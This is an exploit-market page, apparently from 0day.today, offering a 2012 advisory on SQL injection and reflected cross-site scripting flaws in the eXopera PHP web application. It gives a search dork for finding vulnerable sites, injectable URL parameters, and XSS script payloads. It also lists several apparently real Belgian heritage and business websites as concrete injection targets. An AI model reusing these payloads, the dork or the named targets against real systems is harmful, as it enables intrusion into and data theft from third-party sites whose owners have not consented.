[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eXopera Sql Injection/XSS Vulnerabilties

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-18711
Category
web applications
Date add
20-06-2012
Platform
php
eXopera  Sql Injection/XSS Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.exopera.be/
.:. Dork           : "Powered by eXopera"
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/product.php?prodid=sql
http://SITE/dyntxt.php?catno=20&itemno=sql
http://SITE/item.php?itemno=sql
http://SITE/faq.php?catid=sql

Example:

http://www.erfgoedcelsinttruiden.be/product.php?prodid=137[sql]
http://www.erfgoedcelkortrijk.be/product.php?prodid=316[sql]
http://erfgoedcelbrussel.be/product.php?prodid=368[sql]
http://www.erfgoedcelkempenskarakter.be/product.php?prodid=207[sql]
http://www.vandeputtetextiles.eu/dyntxt.php?catno=20&itemno=25[sql]
http://www.erfgoedcelsinttruiden.be/item.php?itemno=1[sql]
http://www.erfgoedcelsinttruiden.be/faq.php?catid=1

More In Google....



Multiple Reflected XSS
=======================

http://SITE/item.php?lang='"--></style></script><script>alert(1337)</script>
http://SITE/faq.php?catid=16&lang='"--></style></script><script>alert(1337)</script>
http://SITE/item.php?itemno='"--></style></script><script>alert(1337)</script>

####################################################################### 



#  0day.today [2024-12-24]  #